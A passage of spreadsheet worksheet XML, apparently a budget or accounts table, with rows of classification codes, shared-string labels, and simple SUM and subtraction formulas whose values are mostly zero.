      <c r="L1306" s="17"/>
      <c r="M1306" s="17"/>
      <c r="N1306" s="17"/>
      <c r="O1306" s="17"/>
      <c r="P1306" s="17"/>
      <c r="Q1306" s="17"/>
      <c r="R1306" s="17"/>
      <c r="S1306" s="17"/>
      <c r="T1306" s="17"/>
      <c r="U1306" s="17"/>
      <c r="V1306" s="17"/>
      <c r="W1306" s="17"/>
      <c r="X1306" s="17"/>
      <c r="Y1306" s="17"/>
      <c r="Z1306" s="17"/>
      <c r="AA1306" s="17"/>
      <c r="AB1306" s="17"/>
      <c r="AC1306" s="17"/>
      <c r="AD1306" s="17"/>
      <c r="AE1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AF1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AG1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AH1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AI1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AJ1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AK1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AL1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AM1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AN1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AO1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AP1306" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
    </row>
    <row r="1307" ht="18" customHeight="1" spans="1:42">
      <c r="A1307" s="10"/>
      <c r="B1307" s="10"/>
      <c r="C1307" s="28"/>
      <c r="D1307" s="10">
        <v>22407</v>
      </c>
      <c r="E1307" s="11" t="s">
        <v>4011</v>
      </c>
      <c r="F1307" s="14">
        <f t="shared" si="603"/>
        <v>29</v>
      </c>
      <c r="G1307" s="12">
        <f t="shared" ref="G1307:R1307" si="610">SUM(G1308:G1310)</f>
        <v>0</v>
      </c>
      <c r="H1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="I1307" s="12">
        <f t="shared" si="610"/>
        <v>14</v>
      </c>
      <c r="J1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="K1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="L1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="M1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="N1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="O1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="P1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="Q1307" s="12">
        <f t="shared" si="610"/>
        <v>0</v>
      </c>
      <c r="R1307" s="12">
        <f t="shared" si="610"/>
        <v>15</v>
      </c>
      <c r="S1307" s="12">
        <v>0</v>
      </c>
      <c r="T1307" s="12">
        <v>0</v>
      </c>
      <c r="U1307" s="12">
        <v>0</v>
      </c>
      <c r="V1307" s="12">
        <v>0</v>
      </c>
      <c r="W1307" s="12">
        <v>0</v>
      </c>
      <c r="X1307" s="12">
        <v>0</v>
      </c>
      <c r="Y1307" s="12">
        <v>0</v>
      </c>
      <c r="Z1307" s="12">
        <v>0</v>
      </c>
      <c r="AA1307" s="12">
        <v>0</v>
      </c>
      <c r="AB1307" s="12">
        <v>0</v>
      </c>
      <c r="AC1307" s="12">
        <v>0</v>
      </c>
      <c r="AD1307" s="12">
        <v>15</v>
      </c>
      <c r="AE1307" s="12">
        <f t="shared" ref="AE1307:AP1307" si="611">SUM(AE1308:AE1310)</f>
        <v>0</v>
      </c>
      <c r="AF1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AG1307" s="12">
        <f t="shared" si="611"/>
        <v>14</v>
      </c>
      <c r="AH1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AI1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AJ1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AK1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AL1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AM1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AN1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AO1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
      <c r="AP1307" s="12">
        <f t="shared" si="611"/>
        <v>0</v>
      </c>
    </row>
    <row r="1308" ht="18" customHeight="1" spans="1:42">
      <c r="A1308" s="10"/>
      <c r="B1308" s="10"/>
      <c r="C1308" s="28"/>
      <c r="D1308" s="10">
        <v>2240703</v>
      </c>
      <c r="E1308" s="16" t="s">
        <v>4012</v>
      </c>
      <c r="F1308" s="14">
        <f t="shared" si="603"/>
        <v>29</v>
      </c>
      <c r="G1308" s="17"/>
      <c r="H1308" s="17"/>
      <c r="I1308" s="17">
        <v>14</v>
      </c>
      <c r="J1308" s="17"/>
      <c r="K1308" s="17"/>
      <c r="L1308" s="17"/>
      <c r="M1308" s="17"/>
      <c r="N1308" s="17"/>
      <c r="O1308" s="17"/>
      <c r="P1308" s="17"/>
      <c r="Q1308" s="17"/>
      <c r="R1308" s="17">
        <v>15</v>
      </c>
      <c r="S1308" s="17"/>
      <c r="T1308" s="17"/>
      <c r="U1308" s="17"/>
      <c r="V1308" s="17"/>
      <c r="W1308" s="17"/>
      <c r="X1308" s="17"/>
      <c r="Y1308" s="17"/>
      <c r="Z1308" s="17"/>
      <c r="AA1308" s="17"/>
      <c r="AB1308" s="17"/>
      <c r="AC1308" s="17"/>
      <c r="AD1308" s="17">
        <v>15</v>
      </c>
      <c r="AE1308" s="17">
        <f t="shared" ref="AE1308:AP1310" si="612">G1308-S1308</f>
        <v>0</v>
      </c>
      <c r="AF1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AG1308" s="17">
        <f t="shared" si="612"/>
        <v>14</v>
      </c>
      <c r="AH1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AI1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AJ1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AK1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AL1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AM1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AN1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AO1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AP1308" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
    </row>
    <row r="1309" ht="18" customHeight="1" spans="1:42">
      <c r="A1309" s="10"/>
      <c r="B1309" s="10"/>
      <c r="C1309" s="28"/>
      <c r="D1309" s="10">
        <v>2240704</v>
      </c>
      <c r="E1309" s="16" t="s">
        <v>4013</v>
      </c>
      <c r="F1309" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1309" s="17"/>
      <c r="H1309" s="17"/>
      <c r="I1309" s="17"/>
      <c r="J1309" s="17"/>
      <c r="K1309" s="17"/>
      <c r="L1309" s="17"/>
      <c r="M1309" s="17"/>
      <c r="N1309" s="17"/>
      <c r="O1309" s="17"/>
      <c r="P1309" s="17"/>
      <c r="Q1309" s="17"/>
      <c r="R1309" s="17"/>
      <c r="S1309" s="17"/>
      <c r="T1309" s="17"/>
      <c r="U1309" s="17"/>
      <c r="V1309" s="17"/>
      <c r="W1309" s="17"/>
      <c r="X1309" s="17"/>
      <c r="Y1309" s="17"/>
      <c r="Z1309" s="17"/>
      <c r="AA1309" s="17"/>
      <c r="AB1309" s="17"/>
      <c r="AC1309" s="17"/>
      <c r="AD1309" s="17"/>
      <c r="AE1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AF1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AG1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AH1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AI1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AJ1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AK1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AL1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AM1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AN1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AO1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AP1309" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
    </row>
    <row r="1310" ht="18" customHeight="1" spans="1:42">
      <c r="A1310" s="10"/>
      <c r="B1310" s="10"/>
      <c r="C1310" s="28"/>
      <c r="D1310" s="10">
        <v>2240799</v>
      </c>
      <c r="E1310" s="16" t="s">
        <v>4014</v>
      </c>
      <c r="F1310" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1310" s="17"/>
      <c r="H1310" s="17"/>
      <c r="I1310" s="17"/>
      <c r="J1310" s="17"/>
      <c r="K1310" s="17"/>
      <c r="L1310" s="17"/>
      <c r="M1310" s="17"/>
      <c r="N1310" s="17"/>
      <c r="O1310" s="17"/>
      <c r="P1310" s="17"/>
      <c r="Q1310" s="17"/>
      <c r="R1310" s="17"/>
      <c r="S1310" s="17"/>
      <c r="T1310" s="17"/>
      <c r="U1310" s="17"/>
      <c r="V1310" s="17"/>
      <c r="W1310" s="17"/>
      <c r="X1310" s="17"/>
      <c r="Y1310" s="17"/>
      <c r="Z1310" s="17"/>
      <c r="AA1310" s="17"/>
      <c r="AB1310" s="17"/>
      <c r="AC1310" s="17"/>
      <c r="AD1310" s="17"/>
      <c r="AE1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AF1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AG1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AH1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AI1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AJ1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AK1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AL1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AM1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AN1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AO1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
      <c r="AP1310" s="17">
        <f t="shared" si="612"/>
        <v>0</v>
      </c>
    </row>
    <row r="1311" ht="18" customHeight="1" spans="1:42">
      <c r="A1311" s="10"/>
      <c r="B1311" s="10"/>
      <c r="C1311" s="28"/>
      <c r="D1311" s="10">
        <v>22499</v>
      </c>
      <c r="E1311" s="11" t="s">
        <v>4015</v>
      </c>
      <c r="F1311" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1311" s="12">
        <f t="shared" ref="G1311:R1311" si="613">G1312</f>
        <v>0</v>
      </c>
      <c r="H1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="I1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="J1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="K1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="L1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="M1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="N1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="O1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="P1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="Q1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="R1311" s="12">
        <f t="shared" si="613"/>
        <v>0</v>
      </c>
      <c r="S1311" s="12">
        <v>0</v>
      </c>
      <c r="T1311" s="12">
        <v>0</v>
      </c>
      <c r="U1311" s="12">
        <v>0</v>
      </c>
      <c r="V1311" s="12">
        <v>0</v>
      </c>
      <c r="W1311" s="12">
        <v>0</v>
      </c>
      <c r="X1311" s="12">
        <v>0</v>
      </c>
      <c r="Y1311" s="12">
        <v>0</v>
      </c>
      <c r="Z1311" s="12">
        <v>0</v>
      </c>
      <c r="AA1311" s="12">
        <v>0</v>
      </c>
      <c r="AB1311" s="12">
        <v>0</v>
      </c>
      <c r="AC1311" s="12">
        <v>0</v>
      </c>
      <c r="AD1311" s="12">
        <v>0</v>
      </c>
      <c r="AE1311" s="12">
        <f t="shared" ref="AE1311:AP1311" si="614">AE1312</f>
        <v>0</v>
      </c>
      <c r="AF1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AG1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AH1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AI1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AJ1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AK1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AL1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AM1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AN1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AO1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
      <c r="AP1311" s="12">
        <f t="shared" si="614"/>
        <v>0</v>
      </c>
    </row>
    <row r="1312" ht="18" customHeight="1" spans="1:42">
      <c r="A1312" s="10"/>
      <c r="B1312" s="10"/>
      <c r="C1312" s="28"/>
      <c r="D1312" s="10">
        <v>2249999</v>
      </c>
      <c r="E1312" s="16" t="s">
        <v>4016</v>
      </c>
      <c r="F1312" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1312" s="17"/>
      <c r="H1312" s="17"/>
      <c r="I1312" s="17"/>
      <c r="J1312" s="17"/>
      <c r="K1312" s="17"/>
      <c r="L1312" s="17"/>
      <c r="M1312" s="17"/>
      <c r="N1312" s="17"/>
      <c r="O1312" s="17"/>
      <c r="P1312" s="17"/>
      <c r="Q1312" s="17"/>
      <c r="R1312" s="17"/>
      <c r="S1312" s="17"/>
      <c r="T1312" s="17"/>
      <c r="U1312" s="17"/>
      <c r="V1312" s="17"/>
      <c r="W1312" s="17"/>
      <c r="X1312" s="17"/>
      <c r="Y1312" s="17"/>
      <c r="Z1312" s="17"/>
      <c r="AA1312" s="17"/>
      <c r="AB1312" s="17"/>
      <c r="AC1312" s="17"/>
      <c r="AD1312" s="17"/>
      <c r="AE1312" s="17">
        <f>G1312-S1312</f>
        <v>0</v>
      </c>
      <c r="AF1312" s="17">
        <f t="shared" ref="AF1312:AP1312" si="615">H1312-T1312</f>
        <v>0</v>
      </c>
      <c r="AG1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AH1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AI1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AJ1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AK1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AL1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AM1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AN1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AO1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
      <c r="AP1312" s="17">
        <f t="shared" si="615"/>
        <v>0</v>
      </c>
    </row>
    <row r="1313" ht="18" customHeight="1" spans="1:42">
      <c r="A1313" s="10"/>
      <c r="B1313" s="10"/>
      <c r="C1313" s="28"/>
      <c r="D1313" s="10">
        <v>229</v>
      </c>
      <c r="E1313" s="11" t="s">
        <v>4017</v>
      </c>
      <c r="F1313" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1313" s="14">
        <f t="shared" ref="G1313:R1314" si="616">G1314</f>
        <v>0</v>
      </c>
      <c r="H1313" s="14">
        <f>H1314</f>
        <v>0</v>
      </c>
      <c r="I1313" s="14">
        <f>I1314</f>
        <v>0</v>
      </c>
      <c r="J1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="K1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="L1313" s="14">
        <f>L1314</f>
        <v>0</v>
      </c>
      <c r="M1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="N1313" s="14">
        <f>N1314</f>
        <v>0</v>
      </c>
      <c r="O1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="P1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="Q1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="R1313" s="14">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="S1313" s="14">
        <v>0</v>
      </c>
      <c r="T1313" s="14">
        <v>0</v>
      </c>
      <c r="U1313" s="14">
        <v>0</v>
      </c>
      <c r="V1313" s="14">
        <v>0</v>
      </c>
      <c r="W1313" s="14">
        <v>0</v>
      </c>
      <c r="X1313" s="14">
        <v>0</v>
      </c>
      <c r="Y1313" s="14">
        <v>0</v>
      </c>
      <c r="Z1313" s="14">
        <v>0</v>
      </c>
      <c r="AA1313" s="14">
        <v>0</v>
      </c>
      <c r="AB1313" s="14">
        <v>0</v>
      </c>
      <c r="AC1313" s="14">
        <v>0</v>
      </c>
      <c r="AD1313" s="14">
        <v>0</v>
      </c>
      <c r="AE1313" s="14">
        <f>AE1314</f>
        <v>0</v>
      </c>
      <c r="AF1313" s="14">
        <f>AF1314</f>
        <v>0</v>
      </c>
      <c r="AG1313" s="14">
        <f>AG1314</f>
        <v>0</v>
      </c>
      <c r="AH1313" s="14">
        <f>AH1314</f>
        <v>0</v>
      </c>
      <c r="AI1313" s="14">
        <f>AI1314</f>
        <v>0</v>
      </c>
      <c r="AJ1313" s="14">
        <f t="shared" ref="AJ1313:AP1313" si="617">AJ1314</f>
        <v>0</v>
      </c>
      <c r="AK1313" s="14">
        <f t="shared" si="617"/>
        <v>0</v>
      </c>
      <c r="AL1313" s="14">
        <f t="shared" si="617"/>
        <v>0</v>
      </c>
      <c r="AM1313" s="14">
        <f t="shared" si="617"/>
        <v>0</v>
      </c>
      <c r="AN1313" s="14">
        <f t="shared" si="617"/>
        <v>0</v>
      </c>
      <c r="AO1313" s="14">
        <f t="shared" si="617"/>
        <v>0</v>
      </c>
      <c r="AP1313" s="14">
        <f t="shared" si="617"/>
        <v>0</v>
      </c>
    </row>
    <row r="1314" ht="18" customHeight="1" spans="1:42">
      <c r="A1314" s="10"/>
      <c r="B1314" s="10"/>
      <c r="C1314" s="28"/>
      <c r="D1314" s="10">
        <v>22999</v>
      </c>
      <c r="E1314" s="11" t="s">
        <v>3879</v>
      </c>
      <c r="F1314" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="H1314" s="12">
        <f>H1315</f>
        <v>0</v>
      </c>
      <c r="I1314" s="12">
        <f>I1315</f>
        <v>0</v>
      </c>
      <c r="J1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="K1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="L1314" s="12">
        <f>L1315</f>
        <v>0</v>
      </c>
      <c r="M1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="N1314" s="12">
        <f>N1315</f>
        <v>0</v>
      </c>
      <c r="O1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="P1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="Q1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="R1314" s="12">
        <f t="shared" si="616"/>
        <v>0</v>
      </c>
      <c r="S1314" s="12">
        <v>0</v>
      </c>
      <c r="T1314" s="12">
        <v>0</v>
      </c>
      <c r="U1314" s="12">
        <v>0</v>
      </c>
      <c r="V1314" s="12">
        <v>0</v>
      </c>
      <c r="W1314" s="12">
        <v>0</v>
      </c>
      <c r="X1314" s="12">
        <v>0</v>
      </c>
      <c r="Y1314" s="12">
        <v>0</v>
      </c>
      <c r="Z1314" s="12">
        <v>0</v>
      </c>
      <c r="AA1314" s="12">
        <v>0</v>
      </c>
      <c r="AB1314" s="12">
        <v>0</v>
      </c>
      <c r="AC1314" s="12">
        <v>0</v>
      </c>
      <c r="AD1314" s="12">
        <v>0</v>
      </c>
      <c r="AE1314" s="12">
        <f t="shared" ref="AE1314:AP1314" si="618">AE1315</f>
        <v>0</v>
      </c>
      <c r="AF1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AG1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AH1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AI1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AJ1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AK1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AL1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AM1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AN1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AO1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
      <c r="AP1314" s="12">
        <f t="shared" si="618"/>
        <v>0</v>
      </c>
    </row>
    <row r="1315" ht="18" customHeight="1" spans="1:42">
      <c r="A1315" s="10"/>
      <c r="B1315" s="10"/>
      <c r="C1315" s="31"/>
      <c r="D1315" s="10">
        <v>2299999</v>
      </c>
      <c r="E1315" s="16" t="s">
        <v>2933</v>
      </c>
      <c r="F1315" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1315" s="17"/>
      <c r="H1315" s="17"/>
      <c r="I1315" s="17"/>
      <c r="J1315" s="17"/>
      <c r="K1315" s="17"/>
      <c r="L1315" s="17"/>
      <c r="M1315" s="17"/>
      <c r="N1315" s="17"/>
      <c r="O1315" s="17"/>
      <c r="P1315" s="17"/>
      <c r="Q1315" s="17"/>
      <c r="R1315" s="17"/>
      <c r="S1315" s="17"/>
      <c r="T1315" s="17"/>
      <c r="U1315" s="17"/>
      <c r="V1315" s="17"/>
      <c r="W1315" s="17"/>
      <c r="X1315" s="17"/>
      <c r="Y1315" s="17"/>
      <c r="Z1315" s="17"/>
      <c r="AA1315" s="17"/>
      <c r="AB1315" s="17"/>
      <c r="AC1315" s="17"/>
      <c r="AD1315" s="17"/>
      <c r="AE1315" s="17">
        <f>G1315-S1315</f>
        <v>0</v>
      </c>
      <c r="AF1315" s="17">
        <f t="shared" ref="AF1315:AP1315" si="619">H1315-T1315</f>
        <v>0</v>
      </c>
      <c r="AG1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AH1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AI1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AJ1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AK1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AL1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AM1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AN1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AO1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
      <c r="AP1315" s="17">
        <f t="shared" si="619"/>
        <v>0</v>
      </c>
    </row>
    <row r="1316" ht="18" customHeight="1" spans="1:42">
      <c r="A1316" s="10"/>
      <c r="B1316" s="10"/>
      <c r="C1316" s="28"/>
      <c r="D1316" s="10">
        <v>232</v>
      </c>
      <c r="E1316" s="11" t="s">
        <v>4018</v>
      </c>
      <c r="F1316" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1316" s="12">
        <f t="shared" ref="G1316:R1316" si="620">SUM(G1317:G1319)</f>
        <v>0</v>
      </c>
      <c r="H1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="I1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="J1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="K1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="L1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="M1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="N1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="O1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="P1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="Q1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="R1316" s="12">
        <f t="shared" si="620"/>
        <v>0</v>
      </c>
      <c r="S1316" s="12">
        <v>0</v>
      </c>
      <c r="T1316" s="12">
        <v>0</v>
      </c>
      <c r="U1316" s="12">
        <v>0</v>
      </c>
      <c r="V1316" s="12">
        <v>0</v>
      </c>
      <c r="W1316" s="12">
        <v>0</v>
      </c>
      <c r="X1316" s="12">
        <v>0</v>
      </c>
      <c r="Y1316" s="12">
        <v>0</v>
      </c>
      <c r="Z1316" s="12">
        <v>0</v>
      </c>
      <c r="AA1316" s="12">
        <v>0</v>
      </c>
      <c r="AB1316" s="12">
        <v>0</v>
      </c>
      <c r="AC1316" s="12">
        <v>0</v>
      </c>
      <c r="AD1316" s="12">
        <v>0</v>
      </c>
      <c r="AE1316" s="12">
        <f t="shared" ref="AE1316:AP1316" si="621">SUM(AE1317:AE1319)</f>
        <v>0</v>
      </c>
      <c r="AF1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AG1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AH1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AI1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AJ1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AK1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AL1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AM1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AN1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AO1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
      <c r="AP1316" s="12">
        <f t="shared" si="621"/>
        <v>0</v>
      </c>
    </row>
    <row r="1317" ht="18" customHeight="1" spans="1:42">
      <c r="A1317" s="10"/>
      <c r="B1317" s="10"/>
      <c r="C1317" s="28"/>
      <c r="D1317" s="10">
        <v>23201</v>
      </c>
      <c r="E1317" s="11" t="s">
        <v>4019</v>
      </c>
      <c r="F1317" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1317" s="17"/>
      <c r="H1317" s="17"/>
      <c r="I1317" s="17"/>
      <c r="J1317" s="17"/>
      <c r="K1317" s="17"/>
      <c r="L1317" s="17"/>
      <c r="M1317" s="17"/>
      <c r="N1317" s="17"/>
      <c r="O1317" s="17"/>
      <c r="P1317" s="17"/>
      <c r="Q1317" s="17"/>
      <c r="R1317" s="17"/>
      <c r="S1317" s="17"/>
      <c r="T1317" s="17"/>
      <c r="U1317" s="17"/>
      <c r="V1317" s="17"/>
      <c r="W1317" s="17"/>
      <c r="X1317" s="17"/>
      <c r="Y1317" s="17"/>
      <c r="Z1317" s="17"/>
